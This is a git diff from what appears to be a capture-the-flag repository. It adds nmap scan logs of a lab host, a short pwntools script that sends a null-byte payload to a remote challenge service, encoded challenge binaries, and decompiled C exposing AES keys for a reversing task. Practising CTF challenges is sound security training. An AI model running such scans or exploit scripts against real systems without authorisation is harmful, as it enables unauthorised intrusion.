"/home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + diff --git a/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_full_tcp_nmap.txt b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_full_tcp_nmap.txt new file mode 100644 index 00000000..a6a9e652 --- /dev/null +++ b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_full_tcp_nmap.txt @@ -0,0 +1 @@ +# Nmap 7.93 scan initiated Sat Oct 28 13:10:06 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_full_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml 10.129.243.131 diff --git a/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_quick_tcp_nmap.txt b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_quick_tcp_nmap.txt new file mode 100644 index 00000000..a7274f97 --- /dev/null +++ b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_quick_tcp_nmap.txt @@ -0,0 +1 @@ +# Nmap 7.93 scan initiated Sat Oct 28 13:10:06 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_quick_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml 10.129.243.131 diff --git a/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml new file mode 100644 index 00000000..4559abe7 --- /dev/null +++ b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml @@ -0,0 +1,17 @@ + + + + + + + + + + + + + + + + + diff --git a/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml new file mode 100644 index 00000000..f19ead27 --- /dev/null +++ b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml @@ -0,0 +1,17 @@ + + + + + + + + + + + + + + + + + diff --git a/LaokoonHaxorcist/pwn_formula/solve.py b/LaokoonHaxorcist/pwn_formula/solve.py new file mode 100644 index 00000000..b8131a67 --- /dev/null +++ b/LaokoonHaxorcist/pwn_formula/solve.py @@ -0,0 +1,9 @@ +from pwn import * + + +# io = process("./formula") + +io = remote("94.237.59.206", 35564) +io.recvuntil("[Marty]:") +io.send(b'\x00' *8) +io.interactive() diff --git a/LaokoonHaxorcist/rev_stringtheory/stringtheory b/LaokoonHaxorcist/rev_stringtheory/stringtheory new file mode 100644 index 0000000000000000000000000000000000000000..2849acbe66da40aab9a922db4add7979e50eef63 GIT binary patch literal 17112 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 + + +KEY1 = { 0xf2, 0xe7, 0xbf, 0xd7, 0x53, 0xc6, 0x4b, 0x26, 0x97, 0xf9, 0x69, 0x87, 0xe6, 0x84, 0x28, 0xe8 } +KEY2 = { 0xdc, 0xf9, 0x90, 0x26, 0x92, 0x27, 0x33, 0x67, 0x24, 0x08, 0xc6, 0x45, 0x51, 0xc7, 0x3a, 0x33 } +KEY3 = { 0xee, 0x31, 0xce, 0xd8, 0x10, 0x70, 0x40, 0xa0, 0xd9, 0x53, 0xcf, 0x57, 0x32, 0x79, 0x73, 0xd5 } +int decrypt(EVP_PKEY_CTX *ctx,uchar *out,size_t *outlen,uchar *in,size_t inlen) + +{ + int local_c; + + for (local_c = 0; local_c < (int)outlen; local_c = local_c + 1) { + AES_decrypt((uchar *)(ctx + (local_c << 4)),out + (local_c << 4),(AES_KEY *)in); + } + return local_c; +} + + + +AES_KEY * the_third_key(void) + +{ + AES_KEY *key; + + key = (AES_KEY *)malloc(0xf4); + AES_set_decrypt_key(KEY1,0x80,key); + return key; +} + + +AES_KEY * the_second_key(void) + +{ + AES_KEY *key; + + key = (AES_KEY *)malloc(0xf4); + AES_set_decrypt_key(KEY2,0x80,key); + return key; +} + + +AES_KEY * the_first_key(void) + +{ + AES_KEY *key; + + key = (AES_KEY *)malloc(0xf4); + AES_set_decrypt_key(KEY3,0x80,key); + return key; +} + +int main(){ + undefined8 *crypt; + crypt = (undefined8 *)malloc(0x20); + FLAG = (char *)malloc(0x20); + *crypt = 0xa646484365c8eb8c; + crypt[1] = 0x9f803f2f42e80598; + crypt[2] = 0x3ed81a287db3c9a8; + crypt[3] = 0x6cb78fe92b1abaaa; +} \ No newline at end of file diff --git a/LaokoonHaxorcist/rev_threekeys/threekeys b/LaokoonHaxorcist/rev_threekeys/threekeys new file mode 100755 index 0000000000000000000000000000000000000000..e819d9eb2e9b8a1ea6ceec6bce0e3697f33f547e GIT binary patch literal 17320 zcmeHOdvF`Y8DCj(Vjw8y5o!W72Lvz=D|TKDP&bloC1-FRBn}WrxG2`y7Fd!;Izdcf z>Neq_2?m!Tl<82K4zv@Pb_Uw%lxBdum_Rxd5}3AW8^EPdWN6dyEP)X9_wDYdoMegV zv@`tC(R%K_{eItLzx{6Se5>32R;XismB%Bvc*QpaagWz3B%lTLU)L3ofS48&cHH5&JVlHF!4FQ%t!J*FHXQL-yn>L(}(Q=$7ocGV=(d@+q_ zr%YL%Z_glO6hof#^iCZ=Q@0)EW?zHS-`8A7YbXIIwVJXWxg)!*w##ZerUxk?6sDX{ z3ZIT=bv(tijf_y3k}j1cZ#faFKVlF!mabH=V9It^z>eblPYb7gscx@aUg~xHOm%m~ z^uFktIkTqsMH>2|@$}k;wR7h*%$em+CHymFzfVRWl*$E*mWzvayk=Z6e935L(DT8Q zN9;F#{NYF2DQ=2^{E-e7($~#NIuSg{RlmNCnh=Ch*=xTTQ?=6P8vvhJLPY+I5_mVT zQu>2s@cYZ))F%T+ak&V9Q4E5=21luOlV$MvW$=MA_#ME{!ZD^;R!=Muw^B|x=~$Mq z+B+9o5j$!3L{pBP>|EH|mx$Y);Wd4>l9iMML(8m`?ZB`rIneJ|H`oJ$FwKkpw38D3 z$!Of^7BM^473-Ize?Y{-eSL{8VOd>k!&Y}R9`1|YjFv16t1cZ>EF6ss;>mS_hE|im zNdi=#BNi_SEn2p$!)n4`qgc?<-qLE#@HfrMS7-QVquVs1s^lN#z>As}Bb3LP2P14V zaK3J}Q)3uzUa^yuQ9RK6H7MUN_kH(%$j6Dj8cR=!9z*{3lQIfFSNJ(Fe1gJ9^mBvp zB^vJyC^_TI@0+J^G?tH*kP#OypPx!iWL-Gfa5?D0^`lsdK5^lEPm!Q5AjN`o>0aSt z1XPW1enb*dAE2|4`ur>+zA->&g>&DCpBtdF!jZUq2?SJ?{2!Y~g)m+CaW1@4tz@8* zfl3A{8K`8Sl7UJF{$Da+uKRn9xuN>E)A8za+cu{vx5r%fYz@DS3Xz-r21L1Y-o$y* z)BtM4_fq#qM{+3V{E2vabsOCy`Im{O*WJ-=lK&0y^a?lnxa4;bPp@vHnC1>ZdkUY4eRv}g8SXJ+0o*S&dgNoU7U_4nc196ElcB+bttlHBC+ zu=#M()Haed9|B_zRliT<;!m8(=getd&S)&GV0#nSD|j26iGneYv@=`F>~#GxL@+(cIAdDVS^n zx|Hq3X;*a^dY)Bm$8_|Y5H5!eE==v#4`H8u^hhpeWi z%&t8MYs4IyRpkb<=Fr3{2=<^KX6B{rYoF(G>q3V;(780U|CXJ@!>*1P@R$85G^q1i zCHIix4w@SlA|2H^{77PMm@E*XnemvJD`+Txs=&{PWP-Io>yWL}kB76xWIog!pn5Cn zPof2p{aE&Uhq)mQzm(#=TWI*2ndh>Ta52!9#J5lcX68l0ugn|YR^Iq!nX|FRr{;}M zE^oZCjPd@%@`4}SLU)uoH2Y_mOi@IS0KaWpdOUh?@ZAX*?hi=8E_C-{)KpLBK}ptj zW4Nt{10jM}bqqDXbUrFqwr74HT;87fDA*ay9A0h?HEaXCtmFL8=^2rI20pK) z3@2f9^@XD`V<3@E8u++&vwf!0zbu_{j5W5=6;9gS=|0ko=3T^4m#&i0o?gdDB=ND& z@AnI{vqgZW5;5E9jmCS_Gz4U6tNX#w&%;g>d zJq-E+=){A$oCEqE=$oMDyqC+3!*2j9K&OEYfwqAj0F8jI{2-TG5Be173!wDfn2P7- zrNXne)^pm#2{pr>3AKcuj$;_@Tu2JKl-3tw8swzE=RhtuNV>k-`M$c#CLMQE&7hb! z<YB}3seMswYOKb9zQ;TfWVUc796L3f&4+p8@@pP z6y!n3!=QQpRV!r!87;m#=(qT4<`3J6`$)Q->>cQ z;ZX7%2c}h$U!vuQG@p-KxASEaURPe+?i@W1=4*PTrrny}sOjyR-mht~ALe@lTq~sS zzrFPj%XVFU?)MHw@A%vL`t1Hg!{^?6-prn9HM>GrJa@^=15GdPtL+bL`s1>fu9`8B z`dy*55O=-%yxnTf|H%W@*_P?^27kDD_b+a(pR(^8k8PQ9;pjcT>RZs-dWlirX0M5c z<3>}X9}9LH=A5r<#*D@pO^r=Wjm2IIc`vQmLL5#EH=^oZaYBB7f?MjPmF#D_5!OE`zb@J>_2SnTem)iAlSQff zz$;D>ye_&>A5V{f8&P$ys1vJ8;-`v{k~lv#kNTqL@;LEc?kJ*a^n9)oJ~2|1XP?Gv z_4;nMqqLAdKmQs38Y&)fG#+Y?N-GXeiTqp-oc!?r6Vjz}BMy%ko9B(dOT}NVUk^$@ zCyMoFp;A;z`FTw0j2#b81NVrr*X0$df6|!iPQMk367l~Fs7H()4-Hk6hq3p?>*$zK z>be6jwa?-tiTlKA{SOJOEPvHF@4MpP9M1-BXdO41A@$ves-Ho4)!6&175E8=b1;w{9IcGACS0DY}DgT{#FT>cWC_cB77roLp51&eggOj^pMfQaay`f;&ozMKml4T zb^_c-rsr)a$R|JT{TPsDv8f6#?1 z`I{){OpWg@%0mnATGxH2S{GuG)MxG}r4@AKzex|Guom?Lr}#Go6u|MP%lLU6YSeC4 z>nkfE?u0(&ZKMdlr;MK`%HTUC?i2UwIOT80)JRv-Njd56Zhx0Jy3NOOVpbPz^hsgs zO(bFU^d;7W`>cqQNT#fCdadY6#QOVe$By_LOKZ^Hov0N~Cc^`k9e0ugqB|Lm*;XVS ziw(fU#aYmF3RG!_58|<``AdTfLsn=}8|_50upi6{nHn_PmI`Y@$KsY?hqZYA{AHm| zt25Zr5hBF`hmk@+Zfp`(+locOh3&0+6H*2JVw7wK3N2?ZQr2 zZJROugl+AOy>%P~|4EqK#ukj%d4B|3Kar+q&d_FyT)P#GLRNP$#KqFW0cm z%ue~yX{+@W+za|~U2E}MZL&28z1}EGjq^vib>J|RTKpg%Qb&^VQqn%7e6Y&DZ zf-GtGg~>qI`uiN=mx=PD>hDQ_b?mh`(=7p|gzTx`?$tLzZv;-5Q>N-}P!?QA3*lI_ z3(Y4S@{HgpV}4{`_;EkRaGUW{|mH zGng*XEm8cW!|`ia+>8q4l0d7uoatiz)xU!TQDhe^lG^^%I8H)bvN1Wx{bY{{$+OKem6wP!gsq6`Ma7x4#t< zw|#!zccwDAlZ38P-2QIJXs*O*;@`1&A9}Gq^GxZ7he2KQ`}LW@xMSo zV~^YC`6lo4=l%RVKG}}1;{&jzF0wt(OZQC&h*Gae{>=7F-+{z!F9KS%QPCxuWx{q$ zKY+k(zdE2aS8Mx0#pcgOzNRXNK*$%zKN3**h_>f;6sp?dI?*FIsC}(YkSuI}9s`<^ zE)_TBv8N>JT+^iJ68!@p{U4%B%JJ~?gYFNGU0JB})pHenzQ{SZ%epijC}nS4sx&4P I85FVN-|-b`Pyhe` literal 0 HcmV?d00001 diff --git a/LaokoonHaxorcist/rev_threekeys/threekeys.patched b/LaokoonHaxorcist/rev_threekeys/threekeys.patched new file mode 100755 index 0000000000000000000000000000000000000000..e6a033b3dcfa5f909c8033a60ae3cb4919e95f24 GIT binary patch literal 17320 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